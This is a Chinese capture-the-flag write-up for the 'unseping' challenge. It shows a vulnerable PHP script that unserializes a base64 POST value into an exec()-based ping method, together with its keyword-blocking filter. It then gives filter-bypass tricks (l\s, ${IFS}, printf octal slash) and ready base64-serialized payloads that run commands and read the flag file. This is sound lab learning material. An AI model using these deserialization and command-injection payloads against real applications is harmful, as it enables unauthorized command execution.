126，【2】攻防世界unseping

进入靶场

审代码

<?php
// 高亮显示当前 PHP 文件的源代码，常用于调试和展示代码结构
highlight_file(__FILE__);

// 定义一个名为 ease 的类
class ease {
    // 定义一个私有属性 $method，用于存储要调用的方法名
    private $method;
    // 定义一个私有属性 $args，用于存储调用方法时传递的参数
    private $args;

    // 构造函数，当创建 ease 类的对象时会自动调用
    // 接收两个参数 $method 和 $args，并将它们分别赋值给类的私有属性
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }

    // 析构函数，当对象被销毁时会自动调用
    function __destruct() {
        // 检查 $method 属性的值是否在数组 array("ping") 中
        // 即判断要调用的方法是否为 "ping"
        if (in_array($this->method, array("ping"))) {
            // 如果是 "ping" 方法，则使用 call_user_func_array 函数调用该方法
            // 并将 $args 数组作为参数传递给该方法
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }

    // 定义 ping 方法，接收一个参数 $ip
    function ping($ip) {
        // 使用 exec 函数执行系统命令，将 $ip 作为命令的一部分执行
        // 并将执行结果存储在 $result 数组中
        exec($ip, $result);
        // 使用 var_dump 函数输出 $result 数组的详细信息
        var_dump($result);
    }

    // 定义 waf 方法，用于对输入的字符串进行过滤和检查
    function waf($str) {
        // 使用 preg_match_all 函数检查 $str 中是否包含特定的危险字符或关键字
        // 如 |、&、;、空格、/、cat、flag、tac、php、ls 等
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            // 如果不包含危险字符或关键字，则返回原字符串
            return $str;
        } else {
            // 如果包含危险字符或关键字，则输出提示信息 "don't hack"
            echo "don't hack";
        }
    }

    // __wakeup 魔术方法，当使用 unserialize 函数对对象进行反序列化时会自动调用
    function __wakeup() {
        // 遍历 $args 数组，对每个元素应用 waf 方法进行过滤
        foreach ($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }
}

// 从 POST 请求中获取名为 'ctf' 的参数值，并赋值给 $ctf 变量
$ctf = @$_POST['ctf'];
// 对 $ctf 进行 base64 解码，然后尝试对解码后的字符串进行反序列化操作
// @ 符号用于抑制可能出现的错误信息
@unserialize(base64_decode($ctf));
?>

解析

1，得知两个参数名method 和 args 

提示了调用的方法是ping，

所以method传ping  

2，args用于存储调用方法时传递的参数，我们看看waf方法过滤了什么，看到包含  ls ，想到先查看目录文件，那么如何绕过，

方法一：通过在l与s之间加两个双引号即可，又因为使用了 call_user_func_array 函数，所以需要以数组形式传参。就这种形式：array()

所以args传array('l""s')

方法二：waf方法是通过_wake up调用的，最后修改属性个数即可绕过，并正常使用  ls

方法三：用l\s，在 Linux 操作系统中 ls 与 l\s 是等价的

3，代码最后告诉我们需要以post方式传参（可以用bp抓包或插件实现），参数名是ctf,而且会对传的内容进行64解码和反序列化操作，所以我们需要进行序列化操作，再进行64编码。

解题

一，查看目录 

l\s

<?php
 
class ease{
	private $method;
	private $args;
	function __construct($method, $args) {
	    $this->method = $method;
	    $this->args = $args;
	}
  
}
$a = new ease('ping',array('l\s'));
$b = serialize($a);
echo $b;
?>

之后代码以此为模板，自己改啊

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozOiJsXHMiO319 

二 ，查看已知文件flag_1s_here

l\s${IFS}f\lag_1s_here

在 Linux 系统的命令行中，默认情况下 IFS 包含空格、制表符和换行符，它用于分隔命令中的各个参数。在这里使用 ${IFS} 来替代空格

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoyMjoibFxzJHtJRlN9ZlxsYWdfMXNfaGVyZSI7fX0=

三，查看flag_831b69012c67b35f.php 

c\at${IFS}f\lag_1s_here$(printf${IFS}"\57")f\lag_831b69012c67b35f.p\hp

• \57 是八进制的 ASCII 码表示，对应的字符是 /
• $(printf${IFS}"\57") 是通过 printf 命令输出 / 字符，以此绕过对 / 的过滤。

Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo3MDoiY1xhdCR7SUZTfWZcbGFnXzFzX2hlcmUkKHByaW50ZiR7SUZTfSJcNTciKWZcbGFnXzgzMWI2OTAxMmM2N2IzNWYucFxocCI7fX0=

 

得到flag